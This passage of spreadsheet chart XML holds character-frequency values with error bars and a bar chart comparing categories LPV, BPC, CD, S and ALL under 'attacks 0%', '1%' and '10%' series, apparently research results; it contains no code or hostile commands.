                    <c:v>1.1872876002474099E-3</c:v>
                  </c:pt>
                  <c:pt idx="16">
                    <c:v>3.0728993936060302E-5</c:v>
                  </c:pt>
                  <c:pt idx="17">
                    <c:v>6.5892277053440304E-4</c:v>
                  </c:pt>
                  <c:pt idx="18">
                    <c:v>8.5046683168457096E-4</c:v>
                  </c:pt>
                  <c:pt idx="19">
                    <c:v>5.8606795543105601E-4</c:v>
                  </c:pt>
                  <c:pt idx="20">
                    <c:v>5.5109498843351301E-4</c:v>
                  </c:pt>
                  <c:pt idx="21">
                    <c:v>5.7222205107360904E-4</c:v>
                  </c:pt>
                  <c:pt idx="22">
                    <c:v>7.7225424163719495E-4</c:v>
                  </c:pt>
                  <c:pt idx="23">
                    <c:v>5.6748240089684601E-4</c:v>
                  </c:pt>
                  <c:pt idx="24">
                    <c:v>3.3042017246797902E-4</c:v>
                  </c:pt>
                  <c:pt idx="25">
                    <c:v>5.2818584918812902E-4</c:v>
                  </c:pt>
                  <c:pt idx="26">
                    <c:v>7.5846303962786102E-4</c:v>
                  </c:pt>
                  <c:pt idx="27">
                    <c:v>3.23378671359412E-4</c:v>
                  </c:pt>
                  <c:pt idx="28">
                    <c:v>1.68046975313782E-4</c:v>
                  </c:pt>
                  <c:pt idx="29">
                    <c:v>6.3805663511589598E-4</c:v>
                  </c:pt>
                  <c:pt idx="30">
                    <c:v>8.8645977370557306E-5</c:v>
                  </c:pt>
                  <c:pt idx="31">
                    <c:v>9.2023809470704698E-4</c:v>
                  </c:pt>
                  <c:pt idx="32">
                    <c:v>4.9145546519000004E-4</c:v>
                  </c:pt>
                  <c:pt idx="33">
                    <c:v>1.43355776392734E-4</c:v>
                  </c:pt>
                  <c:pt idx="34">
                    <c:v>2.7422505887209102E-4</c:v>
                  </c:pt>
                  <c:pt idx="35">
                    <c:v>3.2934331274666798E-4</c:v>
                  </c:pt>
                  <c:pt idx="36">
                    <c:v>2.99031285859678E-4</c:v>
                  </c:pt>
                  <c:pt idx="37">
                    <c:v>1.9265299117195701E-4</c:v>
                  </c:pt>
                  <c:pt idx="38">
                    <c:v>3.4655465139305701E-4</c:v>
                  </c:pt>
                  <c:pt idx="39">
                    <c:v>3.2546930428982299E-4</c:v>
                  </c:pt>
                  <c:pt idx="40">
                    <c:v>3.4727867102221302E-4</c:v>
                  </c:pt>
                  <c:pt idx="41">
                    <c:v>4.73689128700772E-4</c:v>
                  </c:pt>
                  <c:pt idx="42">
                    <c:v>3.3329751254671598E-4</c:v>
                  </c:pt>
                  <c:pt idx="43">
                    <c:v>2.4612445553609302E-4</c:v>
                  </c:pt>
                  <c:pt idx="44">
                    <c:v>3.2602417843641002E-4</c:v>
                  </c:pt>
                  <c:pt idx="45">
                    <c:v>7.5939160791589405E-4</c:v>
                  </c:pt>
                  <c:pt idx="46">
                    <c:v>1.7968113164567399E-4</c:v>
                  </c:pt>
                  <c:pt idx="47">
                    <c:v>2.8621751621699402E-4</c:v>
                  </c:pt>
                  <c:pt idx="48">
                    <c:v>4.0389627686326002E-4</c:v>
                  </c:pt>
                  <c:pt idx="49">
                    <c:v>4.57188727053986E-4</c:v>
                  </c:pt>
                  <c:pt idx="50">
                    <c:v>3.2488148692053298E-4</c:v>
                  </c:pt>
                  <c:pt idx="51">
                    <c:v>3.8754761237528001E-4</c:v>
                  </c:pt>
                  <c:pt idx="52">
                    <c:v>2.58852772545409E-4</c:v>
                  </c:pt>
                  <c:pt idx="53">
                    <c:v>1.8970477592001201E-4</c:v>
                  </c:pt>
                  <c:pt idx="54">
                    <c:v>2.0864310102393401E-4</c:v>
                  </c:pt>
                  <c:pt idx="55">
                    <c:v>2.19578885165197E-4</c:v>
                  </c:pt>
                  <c:pt idx="56">
                    <c:v>1.8496069766611701E-4</c:v>
                  </c:pt>
                  <c:pt idx="57">
                    <c:v>2.1202290212819601E-4</c:v>
                  </c:pt>
                  <c:pt idx="58">
                    <c:v>1.65546177347593E-4</c:v>
                  </c:pt>
                  <c:pt idx="59">
                    <c:v>6.8261267358683304E-5</c:v>
                  </c:pt>
                  <c:pt idx="60">
                    <c:v>1.85663929345837E-4</c:v>
                  </c:pt>
                  <c:pt idx="61">
                    <c:v>1.8460793688676501E-5</c:v>
                  </c:pt>
                  <c:pt idx="62">
                    <c:v>1.7036389065621399E-4</c:v>
                  </c:pt>
                  <c:pt idx="63">
                    <c:v>2.5064531689252602E-4</c:v>
                  </c:pt>
                  <c:pt idx="64">
                    <c:v>8.8795135673064505E-5</c:v>
                  </c:pt>
                  <c:pt idx="65">
                    <c:v>8.0271534635459999E-5</c:v>
                  </c:pt>
                  <c:pt idx="66">
                    <c:v>1.4944055202590901E-4</c:v>
                  </c:pt>
                  <c:pt idx="67">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="68">
                    <c:v>1.11479714492727E-5</c:v>
                  </c:pt>
                  <c:pt idx="69">
                    <c:v>2.2942263354911901E-6</c:v>
                  </c:pt>
                  <c:pt idx="70">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="71">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="72">
                    <c:v>3.8543240006000297E-5</c:v>
                  </c:pt>
                  <c:pt idx="73">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="74">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="75">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="76">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="77">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="78">
                    <c:v>0</c:v>
                  </c:pt>
                </c:numCache>
              </c:numRef>
            </c:plus>
            <c:minus>
              <c:numRef>
                <c:f>Arkusz1!$C$26:$C$104</c:f>
                <c:numCache>
                  <c:formatCode>General</c:formatCode>
                  <c:ptCount val="79"/>
                  <c:pt idx="0">
                    <c:v>1.3706766385595101E-3</c:v>
                  </c:pt>
                  <c:pt idx="1">
                    <c:v>2.7115670719086698E-3</c:v>
                  </c:pt>
                  <c:pt idx="2">
                    <c:v>1.41733951183109E-3</c:v>
                  </c:pt>
                  <c:pt idx="3">
                    <c:v>1.04459934959289E-3</c:v>
                  </c:pt>
                  <c:pt idx="4">
                    <c:v>2.4982641293409499E-3</c:v>
                  </c:pt>
                  <c:pt idx="5">
                    <c:v>1.15009400801675E-3</c:v>
                  </c:pt>
                  <c:pt idx="6">
                    <c:v>9.3244802115303701E-4</c:v>
                  </c:pt>
                  <c:pt idx="7">
                    <c:v>1.8038516555566699E-3</c:v>
                  </c:pt>
                  <c:pt idx="8">
                    <c:v>9.1162976964491297E-4</c:v>
                  </c:pt>
                  <c:pt idx="9">
                    <c:v>1.02394128963288E-3</c:v>
                  </c:pt>
                  <c:pt idx="10">
                    <c:v>1.8396878177830999E-3</c:v>
                  </c:pt>
                  <c:pt idx="11">
                    <c:v>1.18675866776381E-3</c:v>
                  </c:pt>
                  <c:pt idx="12">
                    <c:v>7.9608911894557804E-4</c:v>
                  </c:pt>
                  <c:pt idx="13">
                    <c:v>1.0915634227519899E-3</c:v>
                  </c:pt>
                  <c:pt idx="14">
                    <c:v>6.5880725967970598E-4</c:v>
                  </c:pt>
                  <c:pt idx="15">
                    <c:v>1.1872876002474099E-3</c:v>
                  </c:pt>
                  <c:pt idx="16">
                    <c:v>3.0728993936060302E-5</c:v>
                  </c:pt>
                  <c:pt idx="17">
                    <c:v>6.5892277053440304E-4</c:v>
                  </c:pt>
                  <c:pt idx="18">
                    <c:v>8.5046683168457096E-4</c:v>
                  </c:pt>
                  <c:pt idx="19">
                    <c:v>5.8606795543105601E-4</c:v>
                  </c:pt>
                  <c:pt idx="20">
                    <c:v>5.5109498843351301E-4</c:v>
                  </c:pt>
                  <c:pt idx="21">
                    <c:v>5.7222205107360904E-4</c:v>
                  </c:pt>
                  <c:pt idx="22">
                    <c:v>7.7225424163719495E-4</c:v>
                  </c:pt>
                  <c:pt idx="23">
                    <c:v>5.6748240089684601E-4</c:v>
                  </c:pt>
                  <c:pt idx="24">
                    <c:v>3.3042017246797902E-4</c:v>
                  </c:pt>
                  <c:pt idx="25">
                    <c:v>5.2818584918812902E-4</c:v>
                  </c:pt>
                  <c:pt idx="26">
                    <c:v>7.5846303962786102E-4</c:v>
                  </c:pt>
                  <c:pt idx="27">
                    <c:v>3.23378671359412E-4</c:v>
                  </c:pt>
                  <c:pt idx="28">
                    <c:v>1.68046975313782E-4</c:v>
                  </c:pt>
                  <c:pt idx="29">
                    <c:v>6.3805663511589598E-4</c:v>
                  </c:pt>
                  <c:pt idx="30">
                    <c:v>8.8645977370557306E-5</c:v>
                  </c:pt>
                  <c:pt idx="31">
                    <c:v>9.2023809470704698E-4</c:v>
                  </c:pt>
                  <c:pt idx="32">
                    <c:v>4.9145546519000004E-4</c:v>
                  </c:pt>
                  <c:pt idx="33">
                    <c:v>1.43355776392734E-4</c:v>
                  </c:pt>
                  <c:pt idx="34">
                    <c:v>2.7422505887209102E-4</c:v>
                  </c:pt>
                  <c:pt idx="35">
                    <c:v>3.2934331274666798E-4</c:v>
                  </c:pt>
                  <c:pt idx="36">
                    <c:v>2.99031285859678E-4</c:v>
                  </c:pt>
                  <c:pt idx="37">
                    <c:v>1.9265299117195701E-4</c:v>
                  </c:pt>
                  <c:pt idx="38">
                    <c:v>3.4655465139305701E-4</c:v>
                  </c:pt>
                  <c:pt idx="39">
                    <c:v>3.2546930428982299E-4</c:v>
                  </c:pt>
                  <c:pt idx="40">
                    <c:v>3.4727867102221302E-4</c:v>
                  </c:pt>
                  <c:pt idx="41">
                    <c:v>4.73689128700772E-4</c:v>
                  </c:pt>
                  <c:pt idx="42">
                    <c:v>3.3329751254671598E-4</c:v>
                  </c:pt>
                  <c:pt idx="43">
                    <c:v>2.4612445553609302E-4</c:v>
                  </c:pt>
                  <c:pt idx="44">
                    <c:v>3.2602417843641002E-4</c:v>
                  </c:pt>
                  <c:pt idx="45">
                    <c:v>7.5939160791589405E-4</c:v>
                  </c:pt>
                  <c:pt idx="46">
                    <c:v>1.7968113164567399E-4</c:v>
                  </c:pt>
                  <c:pt idx="47">
                    <c:v>2.8621751621699402E-4</c:v>
                  </c:pt>
                  <c:pt idx="48">
                    <c:v>4.0389627686326002E-4</c:v>
                  </c:pt>
                  <c:pt idx="49">
                    <c:v>4.57188727053986E-4</c:v>
                  </c:pt>
                  <c:pt idx="50">
                    <c:v>3.2488148692053298E-4</c:v>
                  </c:pt>
                  <c:pt idx="51">
                    <c:v>3.8754761237528001E-4</c:v>
                  </c:pt>
                  <c:pt idx="52">
                    <c:v>2.58852772545409E-4</c:v>
                  </c:pt>
                  <c:pt idx="53">
                    <c:v>1.8970477592001201E-4</c:v>
                  </c:pt>
                  <c:pt idx="54">
                    <c:v>2.0864310102393401E-4</c:v>
                  </c:pt>
                  <c:pt idx="55">
                    <c:v>2.19578885165197E-4</c:v>
                  </c:pt>
                  <c:pt idx="56">
                    <c:v>1.8496069766611701E-4</c:v>
                  </c:pt>
                  <c:pt idx="57">
                    <c:v>2.1202290212819601E-4</c:v>
                  </c:pt>
                  <c:pt idx="58">
                    <c:v>1.65546177347593E-4</c:v>
                  </c:pt>
                  <c:pt idx="59">
                    <c:v>6.8261267358683304E-5</c:v>
                  </c:pt>
                  <c:pt idx="60">
                    <c:v>1.85663929345837E-4</c:v>
                  </c:pt>
                  <c:pt idx="61">
                    <c:v>1.8460793688676501E-5</c:v>
                  </c:pt>
                  <c:pt idx="62">
                    <c:v>1.7036389065621399E-4</c:v>
                  </c:pt>
                  <c:pt idx="63">
                    <c:v>2.5064531689252602E-4</c:v>
                  </c:pt>
                  <c:pt idx="64">
                    <c:v>8.8795135673064505E-5</c:v>
                  </c:pt>
                  <c:pt idx="65">
                    <c:v>8.0271534635459999E-5</c:v>
                  </c:pt>
                  <c:pt idx="66">
                    <c:v>1.4944055202590901E-4</c:v>
                  </c:pt>
                  <c:pt idx="67">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="68">
                    <c:v>1.11479714492727E-5</c:v>
                  </c:pt>
                  <c:pt idx="69">
                    <c:v>2.2942263354911901E-6</c:v>
                  </c:pt>
                  <c:pt idx="70">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="71">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="72">
                    <c:v>3.8543240006000297E-5</c:v>
                  </c:pt>
                  <c:pt idx="73">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="74">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="75">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="76">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="77">
                    <c:v>0</c:v>
                  </c:pt>
                  <c:pt idx="78">
                    <c:v>0</c:v>
                  </c:pt>
                </c:numCache>
              </c:numRef>
            </c:minus>
          </c:errBars>
          <c:cat>
            <c:strRef>
              <c:f>Arkusz1!$A$26:$A$104</c:f>
              <c:strCache>
                <c:ptCount val="79"/>
                <c:pt idx="1">
                  <c:v>a</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>e</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>r</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>t</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>l</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>o</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>s</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>i</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>n</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>/</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>h</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>T</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>S</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>A</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>j</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>m</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>q</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>b</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>u</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>d</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>E</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>w</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>M</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>U</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>B</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>Y</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>N</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>k</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>,</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>-</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>H</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>v</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>g</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>K</c:v>
                </c:pt>
                <c:pt idx="39">
                  <c:v>p</c:v>
                </c:pt>
                <c:pt idx="40">
                  <c:v>y</c:v>
                </c:pt>
                <c:pt idx="41">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="42">
                  <c:v>z</c:v>
                </c:pt>
                <c:pt idx="43">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="44">
                  <c:v>c</c:v>
                </c:pt>
                <c:pt idx="45">
                  <c:v>Q</c:v>
                </c:pt>
                <c:pt idx="46">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="47">
                  <c:v>f</c:v>
                </c:pt>
                <c:pt idx="48">
                  <c:v>)</c:v>
                </c:pt>
                <c:pt idx="49">
                  <c:v>D</c:v>
                </c:pt>
                <c:pt idx="50">
                  <c:v>R</c:v>
                </c:pt>
                <c:pt idx="51">
                  <c:v>(</c:v>
                </c:pt>
                <c:pt idx="52">
                  <c:v>I</c:v>
                </c:pt>
                <c:pt idx="53">
                  <c:v>P</c:v>
                </c:pt>
                <c:pt idx="54">
                  <c:v>L</c:v>
                </c:pt>
                <c:pt idx="55">
                  <c:v>.</c:v>
                </c:pt>
                <c:pt idx="56">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="57">
                  <c:v>C</c:v>
                </c:pt>
                <c:pt idx="58">
                  <c:v>Z</c:v>
                </c:pt>
                <c:pt idx="59">
                  <c:v>W</c:v>
                </c:pt>
                <c:pt idx="60">
                  <c:v>J</c:v>
                </c:pt>
                <c:pt idx="61">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="62">
                  <c:v>O</c:v>
                </c:pt>
                <c:pt idx="63">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="64">
                  <c:v>F</c:v>
                </c:pt>
                <c:pt idx="65">
                  <c:v>G</c:v>
                </c:pt>
                <c:pt idx="66">
                  <c:v>x</c:v>
                </c:pt>
                <c:pt idx="67">
                  <c:v>’</c:v>
                </c:pt>
                <c:pt idx="68">
                  <c:v>–</c:v>
                </c:pt>
                <c:pt idx="69">
                  <c:v>V</c:v>
                </c:pt>
                <c:pt idx="70">
                  <c:v>:</c:v>
                </c:pt>
                <c:pt idx="71">
                  <c:v>_</c:v>
                </c:pt>
                <c:pt idx="72">
                  <c:v>&amp;</c:v>
                </c:pt>
                <c:pt idx="73">
                  <c:v>#</c:v>
                </c:pt>
                <c:pt idx="74">
                  <c:v>;</c:v>
                </c:pt>
                <c:pt idx="75">
                  <c:v>'</c:v>
                </c:pt>
                <c:pt idx="76">
                  <c:v>€</c:v>
                </c:pt>
                <c:pt idx="77">
                  <c:v>Ž</c:v>
                </c:pt>
                <c:pt idx="78">
                  <c:v>â</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Arkusz1!$B$26:$B$104</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="79"/>
                <c:pt idx="0">
                  <c:v>0.15168001053733501</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.11277841419948401</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>7.0250308663677999E-2</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>6.3865441775507403E-2</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>6.3659502680833896E-2</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>6.1450683106849598E-2</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>5.9637866986991701E-2</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>5.9086319171247799E-2</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>5.6554101436033601E-2</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>5.45834588280436E-2</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>4.7767193713136799E-2</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>4.6637426900584797E-2</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>4.6317175239227598E-2</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>4.4932475699420701E-2</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>4.4614175612374699E-2</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>4.4321387540131603E-2</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>4.24302134646962E-2</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>4.2208366682050899E-2</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>4.1675614930993699E-2</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>4.1607640923144E-2</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>4.1501795773977897E-2</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>4.1293260927107299E-2</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>4.1010472857112103E-2</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>4.0583126478674299E-2</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>3.9258189452249501E-2</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>3.8305225537636198E-2</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>3.8055282800092599E-2</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>3.7773330303257101E-2</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>3.7432937432937401E-2</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>3.7383544393100897E-2</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>3.7241827939502398E-2</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>3.7229688791907099E-2</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>3.6389091643493597E-2</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>3.60752421785831E-2</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>3.5777873511739298E-2</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>3.5437605827866502E-2</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>3.4757963240752698E-2</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>3.4213938383401199E-2</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>3.4212558541643699E-2</c:v>
                </c:pt>
                <c:pt idx="39">
                  <c:v>3.4193854377618398E-2</c:v>
                </c:pt>
                <c:pt idx="40">
                  <c:v>3.3984028143646601E-2</c:v>
                </c:pt>
                <c:pt idx="41">
                  <c:v>3.3707864551460201E-2</c:v>
                </c:pt>
                <c:pt idx="42">
                  <c:v>3.36082836838879E-2</c:v>
                </c:pt>
                <c:pt idx="43">
                  <c:v>3.3572673651656601E-2</c:v>
                </c:pt>
                <c:pt idx="44">
                  <c:v>3.3393546341740701E-2</c:v>
                </c:pt>
                <c:pt idx="45">
                  <c:v>3.3272274411230297E-2</c:v>
                </c:pt>
                <c:pt idx="46">
                  <c:v>3.2605954542057003E-2</c:v>
                </c:pt>
                <c:pt idx="47">
                  <c:v>3.2418515196030798E-2</c:v>
                </c:pt>
                <c:pt idx="48">
                  <c:v>3.2050108169449899E-2</c:v>
                </c:pt>
                <c:pt idx="49">
                  <c:v>3.1967417726251501E-2</c:v>
                </c:pt>
                <c:pt idx="50">
                  <c:v>3.1871311814802898E-2</c:v>
                </c:pt>
                <c:pt idx="51">
                  <c:v>3.1451579701407197E-2</c:v>
                </c:pt>
                <c:pt idx="52">
                  <c:v>3.1444193201712503E-2</c:v>
                </c:pt>
                <c:pt idx="53">
                  <c:v>3.0860144901869498E-2</c:v>
                </c:pt>
                <c:pt idx="54">
                  <c:v>3.0321108250505699E-2</c:v>
                </c:pt>
                <c:pt idx="55">
                  <c:v>2.9773899071397901E-2</c:v>
                </c:pt>
                <c:pt idx="56">
                  <c:v>2.9737891450003402E-2</c:v>
                </c:pt>
                <c:pt idx="57">
                  <c:v>2.9636608272165001E-2</c:v>
                </c:pt>
                <c:pt idx="58">
                  <c:v>2.9403787620250799E-2</c:v>
                </c:pt>
                <c:pt idx="59">
                  <c:v>2.92777605433725E-2</c:v>
                </c:pt>
                <c:pt idx="60">
                  <c:v>2.9048080688947601E-2</c:v>
                </c:pt>
                <c:pt idx="61">
                  <c:v>2.8793675591343298E-2</c:v>
                </c:pt>
                <c:pt idx="62">
                  <c:v>2.8095809529290899E-2</c:v>
                </c:pt>
                <c:pt idx="63">
                  <c:v>2.7939982776133802E-2</c:v>
                </c:pt>
                <c:pt idx="64">
                  <c:v>2.6709945397075399E-2</c:v>
                </c:pt>
                <c:pt idx="65">
                  <c:v>2.6408296002606999E-2</c:v>
                </c:pt>
                <c:pt idx="66">
                  <c:v>2.5114248324449698E-2</c:v>
                </c:pt>
                <c:pt idx="67">
                  <c:v>2.5000000000000001E-2</c:v>
                </c:pt>
                <c:pt idx="68">
                  <c:v>2.2800100778797999E-2</c:v>
                </c:pt>
                <c:pt idx="69">
                  <c:v>2.24751439037153E-2</c:v>
                </c:pt>
                <c:pt idx="70">
                  <c:v>2.2222222222222199E-2</c:v>
                </c:pt>
                <c:pt idx="71">
                  <c:v>2.1276595744680899E-2</c:v>
                </c:pt>
                <c:pt idx="72">
                  <c:v>1.8207557992886501E-2</c:v>
                </c:pt>
                <c:pt idx="73">
                  <c:v>1.8181818181818198E-2</c:v>
                </c:pt>
                <c:pt idx="74">
                  <c:v>1.8181818181818198E-2</c:v>
                </c:pt>
                <c:pt idx="75">
                  <c:v>1.7857142857142901E-2</c:v>
                </c:pt>
                <c:pt idx="76">
                  <c:v>1.2987012987013E-2</c:v>
                </c:pt>
                <c:pt idx="77">
                  <c:v>1.2987012987013E-2</c:v>
                </c:pt>
                <c:pt idx="78">
                  <c:v>1.2987012987013E-2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88992"/>
        <c:axId val="32390528"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="32388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32390528"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="32390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E(fr)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388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Arkusz1!$G$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>attacks 0%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Arkusz1!$A$2:$A$6</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>LPV</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>BPC</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>CD</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>S</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>ALL</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Arkusz1!$G$2:$G$6</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>0.95488601944842977</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>11.248206599713056</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.18013709548860196</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.17694882831181252</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>3.5070938944683563E-2</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Arkusz1!$H$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>attacks 1%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Arkusz1!$A$2:$A$6</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>LPV</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>BPC</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>CD</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>S</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>ALL</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Arkusz1!$H$2:$H$6</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>1.7152877411127052</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>60.573888091822091</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2.9092937988203413</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>1.9639725809022797</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1.4777618364418939</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Arkusz1!$I$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>attacks 10%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Arkusz1!$A$2:$A$6</c:f>
              <c:strCache>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>LPV</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>BPC</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>CD</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>S</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>ALL</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Arkusz1!$I$2:$I$6</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="5"/>
                <c:pt idx="0">
                  <c:v>31.213135660768373</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>67.352144109676388</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>10.730113183484775</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>10.007970667941974</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>9.4548063127690103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57856"/>
        <c:axId val="32459392"/>
      </c:barChart>
